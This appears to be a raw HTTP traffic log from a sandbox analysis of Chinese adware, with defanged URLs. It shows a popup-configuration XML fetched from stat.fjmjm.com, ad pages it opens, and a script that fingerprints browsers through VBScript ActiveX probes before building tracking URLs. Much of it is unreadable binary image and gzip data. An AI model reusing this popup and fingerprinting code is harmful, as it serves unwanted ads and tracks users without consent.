/....;6......O...1...c...;q3..k..j~g*2N{..z.....).|..f.Tpi...I..^ho..-
.....5..eo.i:.6v...^I,e.cnw6.[.p..5...<5.'.f...u.]TI7..v.......k.L^
"....u... .d..|.......G8$.^..<......QQ..G.G._..C.......<.~..K..K
......JD.W3I.......g'......Th..CyN.......8!...).........x.V..H...l...(
9.k.....8\.-.....2j..J....19.>.I..2qw9(>[email protected].=74U.tK....v
...hs...o|s.KgC}.7..'..R.$......I6R>..{[email protected]...
.</...[...$.1.$\0?.Z..H.].t.^....ec.r............! ...O.|%.>0D..
..."l..z`T...(a.);..VwG..x/........,...4.c,...H......X.n*/.EI]..I....7
k.;._J.m>..h>....mR.<qjl...............Z.....\.x..>.p.G/.J
./..}O;.</..S...]...Z._.........N.lQ.#..D....M{.qY. ..e....e/.Z.Nin
..G.......4...>p....t.Y.4..o..<6.8...O...._.ay.I:.7.....|.Y..q..
.2.kg.H.G...).. ..#.N...~...& .J..PF\D..FQ....'c........M<..i..<<< skipped >>>

GET /imgn/v32/fbg_about.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p4.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: image/png

Content-Length: 3580

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:26 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR.............&u2.....pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......<<< skipped >>>

GET /a/cpv1.html?t=20140601113322 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: stat.fjmjm.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDCASRABDR=LEOJDCNAGKHOKODEHLAIDLMF


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:34:00 GMT

Content-Type: text/html

Content-Length: 1117

Connection: keep-alive

Last-Modified: Sun, 11 May 2014 18:17:40 GMT

Accept-Ranges: bytes

ETag: "0ba444b456dcf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ..<html&g
t;..<head>..<meta http-equiv="Content-Type" content="text/htm
l; charset=gb2312">..<meta http-equiv="cache-control" content="n
o-cache">..<title>..</title>..<style>..*{margin:0
;padding:0;position:relative;top:0;left:0;}..body{font-size:13px;}..a{
color:black;text-decoration:none;border:0px}..#popwin{margin:0 auto;wi
dth:300px;height:265px;border:0px;}..#title{width:auto;height:12px;}..
#title a.btn-close{position:relative;left:230px;width:39px;height:12px
;display:block;}...adright{float:right;width:300px;height:15px;border:
0px} ..</style>..</head>..<body>..<div id="popwin
">..<div class="adright"><p align="right"><a onclick
="window.external.CloseWindow();"><img src="Close.gif"></a
></p></div>..<div id="gList">..<script src="ht
tp://e.70e.com/cpc_img.asp?u=34496&m=6&n=1719,1685,1706,1707,1718&s_px
=1" charset="gb2312"></script>..</div>..</div>..&
lt;script type="text/javascript" src="hXXp://lg1236.565882.com/pShow.p
hp?PID=5534"></script>..<div style="display:none"></
div>..</body>..</html>....
<<< skipped >>>

GET /a/Close.gif HTTP/1.1

Accept: */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: stat.fjmjm.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDCASRABDR=LEOJDCNAGKHOKODEHLAIDLMF


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:34:01 GMT

Content-Type: image/gif

Content-Length: 348

Connection: keep-alive

Last-Modified: Sun, 11 May 2014 18:17:52 GMT

Accept-Ranges: bytes

ETag: "0c86b52456dcf1:420"

Who: ShanIE

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2

GIF89a........................`..p.....M..5...........................
....{...'.....*.....7........?.....3..,..................../..........
.................................................................!....
...,..........y..jH,..).h"....fj.r.T%...ULW).jl...*[email protected]...$*..%...
A....h....~ &...y*...&C&.$h.h$.......c..#(!*!('..(#C#...'...BF. .A.;..

GET /s_images/s_foot_logo.png HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.70e.com

Connection: Keep-Alive

Cookie: Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:25 GMT

Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>..t>....

GET /s_images/s_foot_logo.png HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.70e.com

Connection: Keep-Alive

Cookie: Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:25 GMT

Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....

GET /imgn/sehome/tjv1/new-ico.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/png

Content-Length: 211

Last-Modified: Mon, 28 Jan 2013 11:52:04 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

.PNG........IHDR.............&P......sBIT.....O.....PLTE...???.Mv.....
tRNS..[.".....pHYs.........B.4.....tEXtCreation Time.12/28/12...5....t
EXtSoftware.Adobe FireworksO..N....IDAT..c` .H..!...2.1_.......IEND.B`
.HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Sun, 01 Jun 2014 03:33:32
 GMT..Content-Type: image/png..Content-Length: 211..Last-Modified: Mon
, 28 Jan 2013 11:52:04 GMT..Connection: keep-alive..Expires: Tue, 01 J
ul 2014 03:33:32 GMT..Cache-Control: max-age=2592000..Accept-Ranges: b
ytes...PNG........IHDR.............&P......sBIT.....O.....PLTE...???.M
v.....tRNS..[.".....pHYs.........B.4.....tEXtCreation Time.12/28/12...
5....tEXtSoftware.Adobe FireworksO..N....IDAT..c` .H..!...2.1_.......I
END.B`...

GET /pShow.php?PID=5534 HTTP/1.1

Accept: */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: taoqibao.zhouliboguju.com


HTTP/1.1 200 OK

Server: nginx/1.0.0

Date: Sun, 01 Jun 2014 03:34:17 GMT

Content-Type: text/html; charset=gb2312

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.2.17

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Cache-Control: no-cache, must-revalidate

Set-Cookie: lgPTN43333094029862=0; expires=Sun, 01-Jun-2014 16:00:00 GMT; path=/; domain=.zhouliboguju.com
2f74..var popUrl = 'hXXp://taoqibao.zhouliboguju.com/pClick.php?ap=NTU
zNHw4OTBmYTE3MWZjODIwYmM4NmU3ZDdhODczNDU5YTU0NTg3NA==';..var lgUnionPu
shUrl = CrazyInitUrl(popUrl);..function CrazyInitUrl(urls){...var sf=0
,sc=0,ol='',sd=0;...var ae = function(p) {....v = false;....document.w
rite('<SCRIPT LANGUAGE=VBScript>\n on error resume next \n v = I
sObject(CreateObject("' p '"))<\/SCRIPT>\n');....if(v){.....retu
rn '1';....}else{.....return '0';....}...};...var af = function(p) {..
..var m = '';....for (var i=0; i < navigator.mimeTypes.length; i  )
{.....m  = navigator.mimeTypes[i].type.toLowerCase();....}....v = '0';
....if (m.indexOf(p) != -1){.....if (navigator.mimeTypes[p].enabledPlu
gin != null) v = '1';....}....return v;...};...var __dm  = (navigator.
appName.indexOf("Netscape") != -1);...var __di  = (navigator.userAgent
.toLowerCase().indexOf("msie") != -1);...var __dw = ((navigator.userAg
ent.toLowerCase().indexOf("win")!=-1) || (navigator.userAgent.toLowerC
ase().indexOf("32bit")!=-1));...if(__dw && __di) sf = ae("ShockwaveFla
sh.ShockwaveFlash.1");...if(!__dw || __dm) fs = af("application/x-shoc
kwave-flash");...if(navigator.appName=="Netscape"){....ol = navigator.
language.substr(0,2);...}else{....ol = navigator.userLanguage.substr(0
,2);...}...try{....var us = window.screen.width '_' window.screen.heig
ht;...}catch(e){....var us = 0;...}...if(navigator.cookieEnabled) sc =
 1;...if(document.getElementById) sd = 1;...var t = new Date();...var 
pushTime = parseInt(t.getTime()/1000);...urls ='&pt=1&ft=' pushTim<<< skipped >>>

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1

User-Agent: hello crazyk

Host: stat.fjmjm.com


HTTP/1.1 200 OK

Server: ASERVER/1.2.9-3

Date: Sun, 01 Jun 2014 03:33:08 GMT

Content-Type: text/html

Content-Length: 4659

Connection: keep-alive

Who: ShanIE

Set-Cookie: ASPSESSIONIDCASRABDR=LEOJDCNAGKHOKODEHLAIDLMF; path=/

Cache-control: private

X-Powered-By-Anquanbao: MISS from chn-yz-yj-sb2
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140601113321</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113321&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601
113321</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC<<< skipped >>>

GET /media/id=nHRLPjm3nWRY&gp=401&time=nHnLPjmzrHckPs.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: drmcmm.baidu.com

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sun, 01 Jun 2014 03:33:42 GMT

Server: apache

Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PU
BLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".         "hXXp://VVV.w3.
org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://
VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>.  <
;title>404 - Not Found</title>. </head>. <body>. 
 <h1>404 - Not Found</h1>. </body>.</html>.ont>....

GET /media/id=nHRLPjm3nWRY&gp=401&time=nHnLPjmzrHckPs.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: drmcmm.baidu.com

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Sun, 01 Jun 2014 03:33:43 GMT

Server: apache

Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PU
BLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".         "hXXp://VVV.w3.
org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://
VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>.  <
;title>404 - Not Found</title>. </head>. <body>. 
 <h1>404 - Not Found</h1>. </body>.</html>...

GET /cpc_img.asp?u=34496&m=6&n=1719,1685,1706,1707,1718&s_px=1 HTTP/1.1

Accept: */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private,no-cache

Pragma: no-cache

Content-Type: text/html

Content-Encoding: gzip

Expires: Sat, 31 May 2014 03:34:06 GMT

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

Set-Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB; path=/

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:05 GMT

Content-Length: 330
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"f.t.........\n}...m.u.j..z....~
.......w...5...~.N.Y..-}y1......~t....>...o..g..w...^V.........G...
...>....<..v.~...^.*f...{;...yq1o?....z........W.>....... D..
.....4.y...........i.......j......O7DO.4.|.....n..A.....`......
...


GET /js/cpc_img.js HTTP/1.1

Accept: */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Encoding: gzip

Last-Modified: Thu, 19 Dec 2013 06:38:11 GMT

Accept-Ranges: bytes

ETag: "d95ebde284fcce1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:05 GMT

Content-Length: 572
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...........<......f.|kVM..|.
.........o..M.................j.{...L.v:......F.qb.ux.O\.Y....Z..G..m1
n.....vF{..|..G..]=.{...j.`'.O......E..y}.#..A..X6.,....i?...x....v...
.8.1...^...V./..u.>..Y~^,....V.;..K.../..&...............Ts.....w..
...\...f.{4....f....>1.~../l~..b...C..?........W.T........J..9...Id
..J.3....v8.r........"[email protected][email protected]........}......
~..RF.?!..?R.\.2_._....T......h.>i.uU.....^V......H:..?.......]...#
B...U].y.......?. .w........


GET /code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://stat.fjmjm.com/a/cpv1.html?t=20140601113322

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB


HTTP/1.1 200 OK

Cache-Control: no-cache

Content-Type: text/html

Content-Encoding: gzip

Expires: Sat, 31 May 2014 03:34:06 GMT

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

P3P: CP=CAO PSA OUR

Set-Cookie: Swf70Rid=1; expires=Mon, 02-Jun-2014 03:34:06 GMT; domain=70e.com; path=/

Set-Cookie: stat.fjmjm.com=0; expires=Sun, 01-Jun-2014 04:34:06 GMT; domain=70e.com; path=/

Set-Cookie: dq_0=0; expires=Mon, 02-Jun-2014 03:34:06 GMT; domain=70e.com; path=/

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:06 GMT

Content-Length: 1138
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"~..."o.t..........>:..m.l..\
........Gm...;o..a:.gu...]L....}..="8e.|...............e~w....?h......
(.......f...GiK}(hn...i]..........?...y}..;~0../...........G.q.^*...:.
 .?.]f..GG.Y.6m...h.....FW.}tuu.....O~.iYL.......xw............L.vv.~.
....Y.}.$..}..8...og../.*f.........t.......}.5..o/.j..mO......./......
xR...j...M^].5.6o..m...G.i.....^~....../.e..*.m~......E......>{....
~..{..~D.|...VW..>..N/...r.;........q/|E........KBzcs4._......4...m
....bCs.^.37|.Q...z.N.........P..}.QY]T4.e.4..._.....z'..........g.K..
.....n...B..D..*...j\.......Gw........i..{o....cH'.A.F..=&.fy.q.5.....
......Z1 ..y.'..X\..k....bA...../...Rf..>"..H..d.>.!.}.C.e..B.?-
.i5....E.w._.w. ..ww.^..G.6}u............~.......W...jh..i[T...{..."..
OH..Z...fUf....2....X....o~......t..eV....X.5...........1DyA~..{{....3
L............qQ...........rZO/.qV. ...gc...?.d...f...&.f]..g..UV.h....
5^...i..hce......O/~z.XddI.w....&}gw.......{..H......E...w-=..k'C.\...
&T......U......G7......>..%(..k..M/B5u^..nz.tU.=.d...bv.......[....
.....X..e...J...[_cI...>.....D..........
<<< skipped >>>

GET /s_style/cpc_ztyw.css HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB; Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 200 OK

Content-Type: text/css

Last-Modified: Wed, 09 Oct 2013 06:39:30 GMT

Accept-Ranges: bytes

ETag: "879fd84ebac4ce1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:06 GMT

Content-Length: 2508
#a9{...visibility:hidden;...}...logo_out{...width:74px;...height:18px;
...-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=20)"; 
/*IE8*/...filter:alpha(opacity=80);  /* IE6..IE7*/...opacity: .8;/*Ope
ra9.0 ..Firefox1.5 ..Chrome*/...background-image: url(hXXp://img.70e.c
om/s_images/s_foot_logo.png);...background-repeat: no-repeat;...backgr
ound-position: right center;..  ._filter: progid:DXImageTransform.Micr
osoft.AlphaImageLoader(enabled='true',src="hXXp://img.70e.com/s_images
/s_foot_logo.png");...}...logo_on{...width:74px;...height:18px;...-ms-
filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=20)"; /*IE8*/
...filter:alpha(opacity=80);  /* IE6..IE7*/...opacity: .8;/*Opera9.0 .
.Firefox1.5 ..Chrome*/...background-image: url(hXXp://img.70e.com/s_im
ages/s_foot_logo2.png);...background-repeat: no-repeat;...background-p
osition: -10px center;..}..body{margin:0px;}..#a1 ul{word-break:normal
;PADDING-RIGHT:0px;PADDING-LEFT:5px;PADDING-BOTTOM:2px;MARGIN:0px;WIDT
H:100%;PADDING-TOP:5px;LIST-STYLE-TYPE:none;}..#a1 a:hover{text-decora
tion:underline;}..#a1 ul li{overflow:hidden;Color:#FF0000;..}..#a1 ul 
.error{color:#900;font-weight:bold;font-size:14px;}..#a1 .d1 a{..displ
ay:block;..text-align:left;..text-decoration:none;...font-family:"....
";..}..#a1 .d1 .zbt{..height:25px;..line-height:25px;..overflow:hidden
;..padding-left:5px;..}..#a1 .d1 .zbt a{...font-weight:bold;...display
:inline;...overflow:hidden;...font-size:18px;...border-bottom:1px soli
d red;.../*white-space:nowrap;*/...}..#a1 .d1 .zbt a:hover{...text<<< skipped >>>

GET /code/2012_swf.js HTTP/1.1

Accept: */*

Referer: hXXp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: e.70e.com

Connection: Keep-Alive

Cookie: ASPSESSIONIDQCDBQARB=PMFGHAABLABHAAEMIIAHDLDB; Swf70Rid=1; stat.fjmjm.com=0; dq_0=0


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Encoding: gzip

Last-Modified: Thu, 29 May 2014 02:32:09 GMT

Accept-Ranges: bytes

ETag: "e4d99830e67acf1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sun, 01 Jun 2014 03:34:07 GMT

Content-Length: 841
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"..:=......b..v......o.<....u
..7N..i..v...Ze.....m.zt......N>.V.......Q......,].W.......7w.....o
..o.>H..,...y.N.b..7N~..|...E.L....O/.e......X.....8...q..vU,g..8..
?.39..&?.Y>n..i./..q...yK_.......O.....l.@._f.:..............w.....
....m..............Iq...'.....}...._..n[..x.._T....am..]?......Gw...s.
..R..........*....FM...=`[email protected]#....z.K.....>
;.....df.O..........8kV.....>....._....}....'..............Eu..[L..
.?.........e<[email protected]...\.t.m|../....
.z1l..|N...&.V.Y..k... .sF...~k e.K...o.....>..).P.x...u.. ....7...
?}.`ww .....X".)...........{..........?........ ....o.o...R&.g.IS...*.
.x.:. ..-b...0T*.;M.M(...;G........3.-..WJg......hD....lr..p.L_=..c4.1
j.m...:'!`h..7N..m...y.....

GET /u/js/ufo2.js HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: application/x-javascript

Last-Modified: Tue, 06 Nov 2012 08:12:45 GMT

